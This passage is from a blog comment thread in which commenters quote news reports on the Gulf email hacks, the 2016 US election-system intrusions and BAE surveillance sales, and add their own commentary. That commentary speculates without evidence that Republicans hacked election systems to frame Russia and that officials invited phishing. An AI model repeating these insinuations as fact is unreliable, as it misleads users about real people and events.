    And as these cybersecurity researchers not, not only are the methods in the Otaiba hack similar ito a group of mercenary hackers they assert are working for a number of Gulf states, but that this is the sign of a broader transformation in the accessibility of hacking/disinformation capabilities that were once thought to be relatively exclusive.


    But the dirty tricks also heralded a broader transformation in international espionage. The dust-up in the Gulf is the clearest sign yet that cyberattacks coupled with disinformation campaigns are no longer the exclusive domain of sophisticated powers like Russia. Any country can get in the game for the relatively low price of a few freelance hackers.

    “They seem to be hackers-for-hire, freelancing for all sorts of different clients, and adapting their skills as needed,” said Collin Anderson, who is one of the researchers. Mr. Anderson and his partner, Claudio Guarnieri, have nicknamed the group Bahamut, after a monstrous fish floating in the Arabian Sea in the Jorge Luis Borges novel “Book of Imaginary Beings.”

    The group regularly uses spear phishing attacks — emails designed to look innocent but contain malicious software applications. While it is not yet clear if Bahamut was behind the hack of the ambassador’s email, the group targeted a number of Emirati diplomats as well as other public figures in the Gulf region.

    Other news organizations have reported receiving leaked Emirati emails from a group calling itself GlobalLeaks and using email addressing ending in .ru, suggesting the mercenary hackers may be Russians or wish to pose as Russian.

    “Other news organizations have reported receiving leaked Emirati emails from a group calling itself GlobalLeaks and using email addressing ending in .ru, suggesting the mercenary hackers may be Russians or wish to pose as Russian.”

    Yep, unless the hackers were Russian hackers who wanted to advertise for some reason that they’re Russian hackers, the use of a .ru email address by the group distributing these emails basically tells us nothing about who did it. And while these cybersecurity researchers are suspecting that the “Bahamut” group of mercenaries is behind the hack, if their methods involve spear-phishing emails it’s not like other skill hackers familiar with the cybersecurity industry’s tracking of the Bahamut group couldn’t mimic their methods. That’s the fun of our new digital cold war.

    So at this point it sounds like we have no real idea who did the hack, but whoever did it appears to want to send a “Hi! I’m a Russian hacker!” signal to the world. Of course.

    Posted by Pterrafractyl | June 12, 2017, 8:30 pm
  2. @Pterrafractyl–

    In assessing this, one should not lose sight of the fact that the CIA’s hacking code enables the authorship of the deed to assume an Arabic language cover, as well as Russian, Chinese or Farsi.

    Or, as we might say “Farce-ey.”

    Don’t forget that the Shadow Brokers have seen to it that the entire global hacking community has the NSA’s hacking tools.

    Katy, bar the door!

    Best,

    Dave

    Posted by Dave Emory | June 12, 2017, 8:57 pm
  3. One of the curious aspects of the Kim ‘Dotcom’ Schmitz’s claims about being in contact with Seth Rich is how long he waited to make his big claim that he was in contact with Rich all along. Because that claim didn’t come out until May 19th of this year, a few days after the big Fox News disinformation/hoax piece on Rich. Why didn’t Dotcom make these claims sooner? Like, in the middle of the 2016 campaign? Wouldn’t that have been the optimal time for such a stunt?

    But here’s what adds to the curious timing: Check out this tweet from Dotcom he back in September 28, 2016, and directed to Donald Trump:

    Hey @realDonaldTrump, I'm not 400 pounds and I have never hacked from inside my bed. However, you owe me ??— Kim Dotcom (@KimDotcom) September 28, 2016

    And don’t forget that this tweet came two days after the first Presidential Debate between Donald Trump and Hillary Clinton on September 26, 2017, during which Trump made his infamous “the hacker could have been a 400 pound guy sitting his bed” comment. So Schmitz/’Dotcom’ was clearly responding to Trump’s comment about the hacking. And he’s clearly claiming attribution for something that helped Trump. And yet no claims from Dotcom at the time that Seth Rich was the DNC leaker. Despite how the timing would have been perfect for such a claim…especially if Dotcom has the evidence he claims he has. And yet all we get from Dotcom before his Seth Rich claims last month was a very mysterious tweet that appears to be telling Trump he “owes” Dotcom over the DNC hacks.

    Also keep in mind that if Dotcom, or someone closely associated with him, was the actual hacker, drawing attention to himself back when the election was still going on by making claims about his contacts with Seth Rich could have brought much closer scrutiny to Dotcom with potentially huge implications for the election if suspicions fell on Dotcom. Especially given Dotcom’s predictions back in May of 2015 that Julian Assange was going to be Hillary Clinton’s worst nightmare. So if Dotcom was concerned about getting implicated in the hack, waiting until after the election does kind of make sense.

    But for someone who clearly wanted Hillary to lose to Trump, waiting until now to make these claims instead of last fall really is rather curious. Especially given Dotcom’s September 28th mystery tweet. Unless, of course, making these claims earlier would have been potentially even more damaging to Trump. Which could have been the case if Dotcom was indeed the hacker.

    Posted by Pterrafractyl | June 13, 2017, 2:45 pm
  4. It sounds like the hacking of state election systems in the 2016 election was a lot more extensive than previously reported: Up to 39 states were hacked to one degree or another in a giant spear-phishing campaign according to a recent report in Bloomberg. And while there was no indication that the hackers were attempting to manipulate actual vote tallies, there were some signs that hackers tried, but failed, to manipulate the voter registry databases in Illinois, which could have the effect of changing vote totals by throwing some people off the voter rolls. And since Illinois was one of only a handful of states to give federal investigators full access to their systems it’s unclear how many other states had similar attempts.

    As of now, officials appear to be extremely worried that this mass hacking operation is going to happen in the 2018 or 2020 elections. And, of course, as of now, officials are characterizing the entire thing as an operation of Russian military intelligence, pointing to evidence like the IP address used. Yep, the GRU apparently doesn’t know how to use VPNs, proxies, or TOR and instead decided to use known GRU IP addresses to carry out this incredibly inflammatory hacking operation.

    The article also discusses how the extensive nature of the hacks so alarmed the Obama White House that a special ‘cyber Red Phone’ in October that was set up between Washington and Moscow to defuse potential cyber conflicts was used for the very first time. The Russian government denied responsibility, asked for more information, and said they would investigate it. All while the hacking continued.

    So either the Russian government was executing an unprecedented high-profile self-incriminating wave of incredibly inflammatory hacks and continued to do so even after the ‘cyber Red Phone’ got used for the first time with apparently no concern for the consequences, or someone (like the GOP) was hacking the US electoral systems and trying to frame the Russians. Either way, those state election systems could probably use an overhaul soon:

    Bloomberg Politics

    Russian Cyber Hacks on U.S. Electoral System Far Wider Than Previously Known

    by Michael Riley and Jordan Robertson

    June 13, 2017, 4:00 AM CDT

    * Attackers said to take measure of voting systems, databases
    * A ‘red phone’ warning to the Kremlin from Obama White House

    Russia’s cyberattack on the U.S. electoral system before Donald Trump’s election was far more widespread than has been publicly revealed, including incursions into voter databases and software systems in almost twice as many states as previously reported.

    In Illinois, investigators found evidence that cyber intruders tried to delete or alter voter data. The hackers accessed software designed to be used by poll workers on Election Day, and in at least one state accessed a campaign finance database. Details of the wave of attacks, in the summer and fall of 2016, were provided by three people with direct knowledge of the U.S. investigation into the matter. In all, the Russian hackers hit systems in a total of 39 states, one of them said.

    The scope and sophistication so concerned Obama administration officials that they took an unprecedented step — complaining directly to Moscow over a modern-day “red phone.” In October, two of the people said, the White House contacted the Kremlin on the back channel to offer detailed documents of what it said was Russia’s role in election meddling and to warn that the attacks risked setting off a broader conflict.

    The new details, buttressed by a classified National Security Agency document recently disclosed by the Intercept, show the scope of alleged hacking that federal investigators are scrutinizing as they look into whether Trump campaign officials may have colluded in the efforts. But they also paint a worrisome picture for future elections: The newest portrayal of potentially deep vulnerabilities in the U.S.’s patchwork of voting technologies comes less than a week after former FBI Director James Comey warned Congress that Moscow isn’t done meddling.

    “They’re coming after America,” Comey told the Senate Intelligence Committee investigating Russian interference in the election. “They will be back.”

    A spokeswoman for the Federal Bureau of Investigation in Washington declined to comment on the agency’s probe.

    Kremlin Denials

    Russian officials have publicly denied any role in cyber attacks connected to the U.S. elections, including a massive “spear phishing” effort that compromised Hillary Clinton’s campaign and the Democratic National Committee, among hundreds of other groups. President Vladimir Putin said in recent comments to reporters that criminals inside the country could have been involved without having been sanctioned by the Russian government.

    One of the mysteries about the 2016 presidential election is why Russian intelligence, after gaining access to state and local systems, didn’t try to disrupt the vote. One possibility is that the American warning was effective. Another former senior U.S. official, who asked for anonymity to discuss the classified U.S. probe into pre-election hacking, said a more likely explanation is that several months of hacking failed to give the attackers the access they needed to master America’s disparate voting systems spread across more than 7,000 local jurisdictions.

    Such operations need not change votes to be effective. In fact, the Obama administration believed that the Russians were possibly preparing to delete voter registration information or slow vote tallying in order to undermine confidence in the election. That effort went far beyond the carefully timed release of private communications by individuals and parties.

    One former senior U.S. official expressed concern that the Russians now have three years to build on their knowledge of U.S. voting systems before the next presidential election, and there is every reason to believe they will use what they have learned in future attacks.

    Secure Channel

    As the first test of a communication system designed to de-escalate cyber conflict between the two countries, the cyber “red phone” — not a phone, in fact, but a secure messaging channel for sending urgent messages and documents — didn’t quite work as the White House had hoped. NBC News first reported that use of the red phone by the White House last December.

    The White House provided evidence gathered on Russia’s hacking efforts and reasons why the U.S. considered it dangerously aggressive. Russia responded by asking for more information and providing assurances that it would look into the matter even as the hacking continued, according to the two people familiar with the response.

    “Last year, as we detected intrusions into websites managed by election officials around the country, the administration worked relentlessly to protect our election infrastructure,” said Eric Schultz, a spokesman for former President Barack Obama. “Given that our election systems are so decentralized, that effort meant working with Democratic and Republican election administrators from all across the country to bolster their cyber defenses.”

    Illinois Database

    Illinois, which was among the states that gave the FBI and the Department of Homeland Security almost full access to investigate its systems, provides a window into the hackers’ successes and failures.

    In early July 2016, a contractor who works two or three days a week at the state board of elections detected unauthorized data leaving the network, according to Ken Menzel, general counsel for the Illinois board of elections. The hackers had gained access to the state’s voter database, which contained information such as names, dates of birth, genders, driver’s licenses and partial Social Security numbers on 15 million people, half of whom were active voters. As many as 90,000 records were ultimately compromised.

    But even if the entire database had been deleted, it might not have affected the election, according to Menzel. Counties upload records to the state, not the other way around, and no data moves from the database back to the counties, which run the elections. The hackers had no way of knowing that when they attacked the state database, Menzel said.

    The state does, however, process online voter registration applications that are sent to the counties for approval, Menzel said. When voters are added to the county rolls, that information is then sent back to the state and added to the central database. This process, which is common across states, does present an opportunity for attackers to manipulate records at their inception.

    Patient Zero

    Illinois became Patient Zero in the government’s probe, eventually leading investigators to a hacking pandemic that touched four out of every five U.S. states.

    Using evidence from the Illinois computer banks, federal agents were able to develop digital “signatures” — among them, Internet Protocol addresses used by the attackers — to spot the hackers at work.

    The signatures were then sent through Homeland Security alerts and other means to every state. Thirty-seven states reported finding traces of the hackers in various systems, according to one of the people familiar with the probe. In two others — Florida and California — those traces were found in systems run by a private contractor managing critical election systems.

    (An NSA document reportedly leaked by Reality Winner, the 25-year-old government contract worker arrested last week, identifies the Florida contractor as VR Systems, which makes an electronic voter identification system used by poll workers.)

    In Illinois, investigators also found evidence that the hackers tried but failed to alter or delete some information in the database, an attempt that wasn’t previously reported. That suggested more than a mere spying mission and potentially a test run for a disruptive attack, according to the people familiar with the continuing U.S. counterintelligence inquiry.

    States’ Response

    That idea would obsess the Obama White House throughout the summer and fall of 2016, outweighing worries over the DNC hack and private Democratic campaign emails given to Wikileaks and other outlets, according to one of the people familiar with those conversations. The Homeland Security Department dispatched special teams to help states strengthen their cyber defenses, and some states hired private security companies to augment those efforts.

    In many states, the extent of the Russian infiltration remains unclear. The federal government had no direct authority over state election systems, and some states offered limited cooperation. When then-DHS Secretary Jeh Johnson said last August that the department wanted to declare the systems as national critical infrastructure — a designation that gives the federal government broader powers to intervene — Republicans balked. Only after the election did the two sides eventually reach a deal to make the designation.

    After the Obama administration transmitted its documents and Russia asked for more information, the hackers’ work continued. According to the leaked NSA document, hackers working for Russian military intelligence were trying to take over the computers of 122 local election officials just days before the Nov. 8 election.

    While some inside the Obama administration pressed at the time to make the full scope of the Russian activity public, the White House was ultimately unwilling to risk public confidence in the election’s integrity, people familiar with those discussions said.

    ———-

    “Russian Cyber Hacks on U.S. Electoral System Far Wider Than Previously Known” by Michael Riley and Jordan Robertson; Bloomberg Politics; 06/13/2017

    “In Illinois, investigators also found evidence that the hackers tried but failed to alter or delete some information in the database, an attempt that wasn’t previously reported. That suggested more than a mere spying mission and potentially a test run for a disruptive attack, according to the people familiar with the continuing U.S. counterintelligence inquiry.”

    So in Illinois, one of a handful of states that gave federal investigators the most complete access to their systems and apparently one of the first states hacked since the hack was first detected in July, investigators found evidence of at least attempts at manipulating voter roll data. That’s certainly a big deal and the kind of finding that potentially raises questions about the integrity of a lot more than just the votes for President. ALL races in a state could be impacted by manipulating the voter rolls.

    How about the rest of the states? That’s unclear. Thanks, in part, to the GOP’s blocking of an attempt by DHS to declare the nation’s voting systems as “national critical infrastructure” that would have given federal investigators great access to the other states’ voting systems:


    In many states, the extent of the Russian infiltration remains unclear. The federal government had no direct authority over state election systems, and some states offered limited cooperation. When then-DHS Secretary Jeh Johnson said last August that the department wanted to declare the systems as national critical infrastructure — a designation that gives the federal government broader powers to intervene — Republicans balked. Only after the election did the two sides eventually reach a deal to make the designation.

    And at this point federal investigators apparently can’t really say how many other states experienced similar attempts. Still, based on the digital “signatures” that investigators have identified (because the ‘Russian hackers’ apparently didn’t bother trying to obscure them), “traces” of the hackers were found in the systems of 39 states:


    Patient Zero

    Illinois became Patient Zero in the government’s probe, eventually leading investigators to a hacking pandemic that touched four out of every five U.S. states.

    Using evidence from the Illinois computer banks, federal agents were able to develop digital “signatures” — among them, Internet Protocol addresses used by the attackers — to spot the hackers at work.

    The signatures were then sent through Homeland Security alerts and other means to every state. Thirty-seven states reported finding traces of the hackers in various systems, according to one of the people familiar with the probe. In two others — Florida and California — those traces were found in systems run by a private contractor managing critical election systems.

    (An NSA document reportedly leaked by Reality Winner, the 25-year-old government contract worker arrested last week, identifies the Florida contractor as VR Systems, which makes an electronic voter identification system used by poll workers.)

    And it sounds like a large number of those hacks (or hack attempts) took place in the last week of the campaign:


    After the Obama administration transmitted its documents and Russia asked for more information, the hackers’ work continued. According to the leaked NSA document, hackers working for Russian military intelligence were trying to take over the computers of 122 local election officials just days before the Nov. 8 election.

    So, overall, if we take this report at face value, the Russian government brazenly hacked into the Illinois state voting systems, tried to manipulate voter roll data, and then continued to brazenly hack – or attempt to hack – into at least 38 other states. All using digital “signatures”, like IP address, that were traced back to the GRU. And the really big wave of attacks happened in the last week of the campaign, after President Obama used the “cyber Red Phone” for the first time ever in October. And the Russian government ignored those calls to stop the hacking without any apparent fear of reprisal. And just kept hacking away without bothering to change those digital “signatures” from the July Illinois hack. Are we sure “Lazy Bear” isn’t a more appropriate moniker for this alleged GRU hacking group? “Fancy Bear” doesn’t quite capture their main attribute.

    Of course, since digital “signatures” are the kind of things hackers can often spoof and a declaration of cyber war would be an insane move by the Russian government, there’s the very obvious possibility that someone else made all these hacking attempts. So it’s worth noting that in The Intercept report about the leaked NSA document showing the analysis of the hacking of a Florida voting systems company they interview Jake Williams – a former member of NSA’s elite hacking Tailored Access Operations team – and ask him about the spear-phishing campaign used against those 122 officials in the last week of the campaign. According to Williams, that spear-phishing operation was of “medium sophistication” that “practically any hacker can pull off”:

    The Intercept

    Top-Secret NSA Report Details Russian Hacking Effort Days Before 2016 Election

    Matthew Cole, Richard Esposito, Sam Biddle, Ryan Grim

    June 5 2017, 2:44 p.m.

    Russian military intelligence executed a cyberattack on at least one U.S. voting software supplier and sent spear-phishing emails to more than 100 local election officials just days before last November’s presidential election, according to a highly classified intelligence report obtained by The Intercept.

    The top-secret National Security Agency document, which was provided anonymously to The Intercept and independently authenticated, analyzes intelligence very recently acquired by the agency about a months-long Russian intelligence cyber effort against elements of the U.S. election and voting infrastructure. The report, dated May 5, 2017, is the most detailed U.S. government account of Russian interference in the election that has yet come to light.

    While the document provides a rare window into the NSA’s understanding of the mechanics of Russian hacking, it does not show the underlying “raw” intelligence on which the analysis is based. A U.S. intelligence officer who declined to be identified cautioned against drawing too big a conclusion from the document because a single analysis is not necessarily definitive.

    The report indicates that Russian hacking may have penetrated further into U.S. voting systems than was previously understood. It states unequivocally in its summary statement that it was Russian military intelligence, specifically the Russian General Staff Main Intelligence Directorate, or GRU, that conducted the cyber attacks described in the document:

    Russian General Staff Main Intelligence Directorate actors … executed cyber espionage operations against a named U.S. company in August 2016, evidently to obtain information on elections-related software and hardware solutions. … The actors likely used data obtained from that operation to … launch a voter registration-themed spear-phishing campaign targeting U.S. local government organizations.

    This NSA summary judgment is sharply at odds with Russian President Vladimir Putin’s denial last week that Russia had interfered in foreign elections: “We never engaged in that on a state level, and have no intention of doing so.” Putin, who had previously issued blanket denials that any such Russian meddling occurred, for the first time floated the possibility that freelance Russian hackers with “patriotic leanings” may have been responsible. The NSA report, on the contrary, displays no doubt that the cyber assault was carried out by the GRU.

    The Spear-Phishing Attack

    As described by the classified NSA report, the Russian plan was simple: pose as an e-voting vendor and trick local government employees into opening Microsoft Word documents invisibly tainted with potent malware that could give hackers full control over the infected computers.

    But in order to dupe the local officials, the hackers needed access to an election software vendor’s internal systems to put together a convincing disguise. So on August 24, 2016, the Russian hackers sent spoofed emails purporting to be from Google to employees of an unnamed U.S. election software company, according to the NSA report. Although the document does not directly identify the company in question, it contains references to a product made by VR Systems, a Florida-based vendor of electronic voting services and equipment whose products are used in eight states.

    The spear-phishing email contained a link directing the employees to a malicious, faux-Google website that would request their login credentials and then hand them over to the hackers. The NSA identified seven “potential victims” at the company. While malicious emails targeting three of the potential victims were rejected by an email server, at least one of the employee accounts was likely compromised, the agency concluded. The NSA notes in its report that it is “unknown whether the aforementioned spear-phishing deployment successfully compromised all the intended victims, and what potential data from the victim could have been exfiltrated.”

    VR Systems declined to respond to a request for comment on the specific hacking operation outlined in the NSA document. Chief Operating Officer Ben Martin replied by email to The Intercept’s request for comment with the following statement:

    Phishing and spear-phishing are not uncommon in our industry. We regularly participate in cyber alliances with state officials and members of the law enforcement community in an effort to address these types of threats. We have policies and procedures in effect to protect our customers and our company.

    Although the NSA report indicates that VR Systems was targeted only with login-stealing trickery, rather than computer-controlling malware, this isn’t necessarily a reassuring sign. Jake Williams, founder of computer security firm Rendition Infosec and formerly of the NSA’s Tailored Access Operations hacking team, said stolen logins can be even more dangerous than an infected computer. “I’ll take credentials most days over malware,” he said, since an employee’s login information can be used to penetrate “corporate VPNs, email, or cloud services,” allowing access to internal corporate data. The risk is particularly heightened given how common it is to use the same password for multiple services. Phishing, as the name implies, doesn’t require everyone to take the bait in order to be a success — though Williams stressed that hackers “never want just one” set of stolen credentials.

    In any event, the hackers apparently got what they needed. Two months later, on October 27, they set up an “operational” Gmail account designed to appear as if it belonged to an employee at VR Systems, and used documents obtained from the previous operation to launch a second spear-phishing operation “targeting U.S. local government organizations.” These emails contained a Microsoft Word document that had been “trojanized” so that when it was opened it would send out a beacon to the “malicious infrastructure” set up by the hackers.

    The NSA assessed that this phase of the spear-fishing operation was likely launched on either October 31 or November 1 and sent spear-fishing emails to 122 email addresses “associated with named local government organizations,” probably to officials “involved in the management of voter registration systems.” The emails contained Microsoft Word attachments purporting to be benign documentation for VR Systems’ EViD voter database product line, but which were in reality maliciously embedded with automated software commands that are triggered instantly and invisibly when the user opens the document. These particular weaponized files used PowerShell, a Microsoft scripting language designed for system administrators and installed by default on Windows computers, allowing vast control over a system’s settings and functions. If opened, the files “very likely” would have instructed the infected computer to begin downloading in the background a second package of malware from a remote server also controlled by the hackers, which the secret report says could have provided attackers with “persistent access” to the computer or the ability to “survey the victims for items of interest.” Essentially, the weaponized Word document quietly unlocks and opens a target’s back door, allowing virtually any cocktail of malware to be subsequently delivered automatically.

    According to Williams, if this type of attack were successful, the perpetrator would possess “unlimited” capacity for siphoning away items of interest. “Once the user opens up that email [attachment],” Williams explained, “the attacker has all the same capabilities that the user does.” Vikram Thakur, a senior research manager at Symantec’s Security Response Team, told The Intercept that in cases like this the “quantity of exfiltrated data is only limited by the controls put in place by network administrators.” Data theft of this variety is typically encrypted, meaning anyone observing an infected network wouldn’t be able to see what exactly was being removed but should certainly be able to tell something was afoot, Williams added. Overall, the method is one of “medium sophistication,” Williams said, one that “practically any hacker can pull off.”

    The NSA, however, is uncertain about the results of the attack, according to the report. “It is unknown,” the NSA notes, “whether the aforementioned spear-phishing deployment successfully compromised the intended victims, and what potential data could have been accessed by the cyber actor.”

    ———-

    “Top-Secret NSA Report Details Russian Hacking Effort Days Before 2016 Election” by Matthew Cole, Richard Esposito, Sam Biddle, Ryan Grim; The Intercept; 06/05/2017

    The NSA assessed that this phase of the spear-fishing operation was likely launched on either October 31 or November 1 and sent spear-fishing emails to 122 email addresses “associated with named local government organizations,” probably to officials “involved in the management of voter registration systems.” The emails contained Microsoft Word attachments purporting to be benign documentation for VR Systems’ EViD voter database product line, but which were in reality maliciously embedded with automated software commands that are triggered instantly and invisibly when the user opens the document…”

    A spear-phishing attacks using documents from the Florida-based “VR Systems” as the bait. That’s what the alleged Russian hackers did in the last week of the campaign. And how sophisticated was this spear-phishing attack? Almost any hacker could have done it. That’s how sophisticated:


    According to Williams, if this type of attack were successful, the perpetrator would possess “unlimited” capacity for siphoning away items of interest. “Once the user opens up that email [attachment],” Williams explained, “the attacker has all the same capabilities that the user does.” Vikram Thakur, a senior research manager at Symantec’s Security Response Team, told The Intercept that in cases like this the “quantity of exfiltrated data is only limited by the controls put in place by network administrators.” Data theft of this variety is typically encrypted, meaning anyone observing an infected network wouldn’t be able to see what exactly was being removed but should certainly be able to tell something was afoot, Williams added. Overall, the method is one of “medium sophistication,” Williams said, one that “practically any hacker can pull off.”

    “Overall, the method is one of “medium sophistication,” Williams said, one that “practically any hacker can pull off.””

    So according to federal investigators, ‘the GRU’ used a spear-phishing technique that any hacker could have pulled off, and did it in a manner that left digital “signatures”, like IP address, that apparently led back to the GRU. And kept the same digital signatures in the July 2016 hack on the Illinois voting system that were found in the wave of spear-phishing attacks in the last week of the campaign. Even after getting a “cyber Red Phone” call from the White House in for the first time ever in October, thus opening Russia to potential revenge attacks for years to come and poison-pilling the possible utility of having a Russian-friendly President Trump in the White House. It’s as if the cost-benefit analysis didn’t factor in the costs. That’s the story we’re supposed to accept.

    And, amazingly, based on the first report, it sounds the bulk of the 39 hacked states got hacked by this spear-phishing campaign in the last week of the campaign despite the intense focus around potential hacking in the prior months. Those must have been some pretty compelling phishing emails. It raises the question as to whether or not some of the those 122 targeted officials were trying to get their systems hacked. Keep in mind one of the very interesting things about a spear-phishing attack in a scenario like these one one of the hacked parties (the GOP) just might want to get hacked: Spear-phishing a great way for an insider to invite in a hacker while maintaining plausible deniability. Oops! I was tricked! ;)

    It’s pretty clear that US state voting systems have a number of serious vulnerabilities. Specifically, people who fall for phishing emails and whatever malware is now install on those systems after those hacks. Also note one of the main things protecting these systems from a much bigger hack: the decentralized nature of US voting systems, which different locales use different technologies. It’s a lot harder to pull off a big hack in a decentralized system. And let’s also not forget that one of the giant voting vulnerabilities today is a direct consequence of the US’s response to the 2000 election voting debacle in Florida. Following that, Congress gave states gobs of cash to replace their paper ballot systems with hackable electronic voting machines. And now we a problem with hackable electronic voting machines. Still.

    So if there is a big push to overhaul and improve US voting systems in anticipation of the 2016 hackers returning in future elections keep in mind that it’s a lot harder to hack paper ballots.

    Posted by Pterrafractyl | June 14, 2017, 10:21 pm
  5. Here’s an article that reminds us of something to keep in mind when assessing the curious case of the apparent hacking of Qatar’s news agency followed by the email hack of the UAE’s ambassador to the US that some suspect was done by a mercenary hacker group: Middle Eastern governments probably don’t need to hire rogue hacker mercenary groups to carry out very sophisticated hacks:

    BBC

    How BAE sold cyber-surveillance tools to Arab states

    15 June 2017

    A year-long investigation by BBC Arabic and a Danish newspaper has uncovered evidence that the UK defence giant BAE Systems has made large-scale sales across the Middle East of sophisticated surveillance technology, including to many repressive governments.

    These sales have also included decryption software which could be used against the UK and its allies.

    While the sales are legal, human rights campaigners and cyber-security experts have expressed serious concerns these powerful tools could be used to spy on millions of people and thwart any signs of dissent.

    The investigation began in the small Danish town of Norresundby, home to ETI, a company specialising in high-tech surveillance equipment.

    ETI developed a system called Evident, which enabled governments to conduct mass surveillance of their citizens’ communications.

    A former employee, speaking to the BBC anonymously, described how Evident worked.

    “You’d be able to intercept any internet traffic,” he said. “If you wanted to do a whole country, you could. You could pin-point people’s location based on cellular data. You could follow people around. They were quite far ahead with voice recognition. They were capable of decrypting stuff as well.”

    One early customer of the new system was the Tunisian government.

    The BBC tracked down a former Tunisian intelligence official who operated Evident for the country’s veteran leader, President Zine al-Abidine Ben Ali.

    “ETI installed it and engineers came for training sessions,” he explained. “[It] works with keywords. You put in an opponent’s name and you will see all the sites, blogs, social networks related to that user.”

    The source says President Ben Ali used the system to crack down on opponents until his overthrow in January 2011, in the first popular uprising of the Arab Spring.

    Campaigners ‘vanished’

    As protests spread across the Arab world, social media became a key tool for organisers.

    Governments began shopping around for more sophisticated cyber-surveillance systems – opening up a lucrative new market for companies like BAE Systems.

    In 2011, BAE bought ETI and the company became part of BAE Systems Applied Intelligence.

    Over the next five years, BAE used its Danish subsidiary to supply Evident systems to many Middle Eastern countries with questionable human rights records.

    Freedom of information requests submitted by the BBC and the Dagbladet Information newspaper in Denmark revealed exports to Saudi Arabia, the UAE, Qatar, Oman, Morocco and Algeria.

    While it is not possible to link individual cases directly to the Evident system, increased levels of cyber-surveillance since the start of the Arab Spring have had a direct and devastating impact on the activities of human rights and democracy campaigners in many of the states that acquired it.

    “I wouldn’t be exaggerating if I said more than 90% of the most active campaigners in 2011 have now vanished,” says Yahya Assiri, a former Saudi air force officer who fled the country after posting pro-democracy statements online.

    “It used to be that ‘the walls have ears’, but now it’s ‘smartphones have ears,'” says Manal al-Sharif, a Saudi women’s rights activist who also now lives abroad.

    “No country monitors its own people the way they do in the Gulf countries. They have the money, so they can buy advanced surveillance software.”

    The situation has led campaigners to voice deep concerns about the future of civil society in the Middle East.

    “Surveillance will destroy people’s confidence in organising, expressing and sharing ideas, trying to create a political movement,” warns Gus Hosein of London-based Privacy International.

    ‘Responsible trading’

    The BBC has also asked for responses from the governments of Saudi Arabia, Oman and the UAE. It has not yet received any replies.

    All sales of Evident were made entirely legally under Danish government export licences, issued by the Danish Business Authority.

    BAE Systems in the UK declined a BBC request for an interview on the issue, saying it was against company policy to comment on specific contracts. But in a written statement the company said: “BAE systems works for a number of organisations around the world within the regulatory framework of all relevant countries and within our responsible trading principles.”

    During the course of the BBC investigation, it emerged that sales of Evident could also potentially have an impact on national security in the UK.

    An upgraded version of the system now offers another capability – decryption or, to use the technical term, cryptanalysis.

    This enables users to read communications even if they have been security encrypted.

    Cryptanalysis is such a powerful tool that its export is tightly controlled.

    Export authorisations

    The BBC has obtained a 2015 email exchange between the British and Danish export authorities in which the British side clearly expresses concern about this capability with reference to an Evident sale to the United Arab Emirates.

    “We would refuse a licence to export this cryptanalysis software from the UK because of Criteria 5 concerns,” says the email.

    “Criteria 5” refers to the national security of the UK and its allies.

    The worry is that the software could give users access to the UK’s own communications.

    “Once you’ve sold the equipment to someone they can probably do what they want with it,” says Ross Anderson, professor of Security Engineering at Cambridge University.

    “An Arab country wants to buy cryptanalysis equipment supposedly for its own law enforcement. They have embassies in London, Washington, Paris and Berlin. What’s to stop them putting bulk surveillance equipment in our cities and then using the cryptanalysis equipment to decipher all the mobile phone calls they hear?”

    Despite British objections, the Danish authorities approved the Evident export.

    The Danish foreign ministry declined to be interviewed but in statement said the Danish Business Authority would not grant export authorisation if an EU member state requested that it did not because of security concerns.

    Defence experts argue that at a time when countries around the world face heightened terrorist threats, there is a clear justification for sales of surveillance equipment.

    “It’s a trade-off,” says Jonathan Shaw, former head of Cyber-Security at the UK Ministry of Defence.

    “I would imagine the consideration that plays in people’s minds is not so much the economic advantage… but it’s that the security of the state we’re talking to is closely linked to ours. Or they are tracking people who are a direct threat to Britain and we need their assistance.”

    According to a 2016 UK Home Office report, mass surveillance technology has played a significant role in every major counter-terrorism investigation in the last decade.

    “The more terrorist incidents there are, the more people will start to see the benefits of favouring security over privacy,” Mr Shaw adds.

    ‘Unacceptable’

    Dutch MEP Marietje Schaake is one of the few European politicians prepared to discuss concerns about surveillance technology exports.

    She says European countries will ultimately pay a price for the compromises now being made.

    “Each and every case where someone is silenced or ends up in prison with the help of EU-made technologies I think is unacceptable,” she told the BBC.

    “I think the fact that these companies are commercial players, developing these highly sophisticated technologies that could have a deep impact on our national security, on people’s lives, requires us to look again at what kind of restrictions maybe be needed, what kind of transparency and accountability is needed in this market before it turns against our own interest and our own principles.”

    ———-

    “How BAE sold cyber-surveillance tools to Arab states”; BBC; 06/15/2017

    “”You’d be able to intercept any internet traffic,” he said. “If you wanted to do a whole country, you could. You could pin-point people’s location based on cellular data. You could follow people around. They were quite far ahead with voice recognition. They were capable of decrypting stuff as well.””

    That sounds like some pretty advanced hacking capabilities. Advanced hacking capabilities in a lot of government hands:


    As protests spread across the Arab world, social media became a key tool for organisers.

    Governments began shopping around for more sophisticated cyber-surveillance systems – opening up a lucrative new market for companies like BAE Systems.

    In 2011, BAE bought ETI and the company became part of BAE Systems Applied Intelligence.

    Over the next five years, BAE used its Danish subsidiary to supply Evident systems to many Middle Eastern countries with questionable human rights records.

    Freedom of information requests submitted by the BBC and the Dagbladet Information newspaper in Denmark revealed exports to Saudi Arabia, the UAE, Qatar, Oman, Morocco and Algeria.

    And it’s not like these advanced hacking capabilities only work in the Middle East:


    The BBC has obtained a 2015 email exchange between the British and Danish export authorities in which the British side clearly expresses concern about this capability with reference to an Evident sale to the United Arab Emirates.

    “We would refuse a licence to export this cryptanalysis software from the UK because of Criteria 5 concerns,” says the email.

    “Criteria 5” refers to the national security of the UK and its allies.

    The worry is that the software could give users access to the UK’s own communications.

    “Once you’ve sold the equipment to someone they can probably do what they want with it,” says Ross Anderson, professor of Security Engineering at Cambridge University.

    “An Arab country wants to buy cryptanalysis equipment supposedly for its own law enforcement. They have embassies in London, Washington, Paris and Berlin. What’s to stop them putting bulk surveillance equipment in our cities and then using the cryptanalysis equipment to decipher all the mobile phone calls they hear?”

    So when the next big ‘whodunnit?’ hack attack happens and people start assembling a suspect list and asking ‘cui bono?’, don’t forget that BAE already sold these capabilities to a number of the governments across the Middle East.

    Also don’t forget that selling advanced hacking tools to Middle Eastern governments isn’t some BAE monopoly. It’s a competitive market.

    Posted by Pterrafractyl | June 16, 2017, 2:34 pm
  6. You know that report about how the election systems of 39 US states were “hit” by ‘Russian hackers’, most of them just a week, before the 2016 November election? Well, the National Association of Secretaries of State, an organization that represents the chief election officials in 40 states, has a rebuttal: They have no idea what this report was talking about and believe it’s a matter of cybersecurity firms being overly aggressive to earn state contracts to protect election systems:

    Benzinga

    State Election Officials Baffled By Report 39 States ‘Hit’ By Russian Hackers

    Mark Fritz , Benzinga Staff Writer
    June 15, 2017 1:16pm

